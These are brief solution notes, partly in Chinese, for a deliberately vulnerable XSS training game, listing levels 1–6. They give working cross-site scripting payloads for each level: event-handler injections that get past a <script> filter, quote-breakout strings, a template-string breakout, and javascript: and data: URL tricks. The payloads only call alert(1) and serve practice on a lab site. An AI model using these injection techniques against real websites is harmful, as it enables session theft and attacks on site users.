https://xss-game.appspot.com/level1
https://xss-game.appspot.com/level1
payload: <svg onload=alert(1)>
https://xss-game.appspot.com/level2
过滤掉了<script>关键词
payloads:
<svg onload=alert(1)>
<input autofocus onfocus=alert(1)>
<video><source onerror="JavaScript:alert(1)">
<marquee onstart=alert(1)>
https://xss-game.appspot.com/level3
payload1: ' onerror='alert(1)' >
payload2: ' onmouseover=alert(1)//
https://xss-game.appspot.com/level4
sourcecode:
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
payload1: 5'),alert('1
payload2: 5'),alert('1')//
https://xss-game.appspot.com/level5
payload: javascript:alert(1)
https://xss-game.appspot.com/level6
payload: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('1')
联系客服
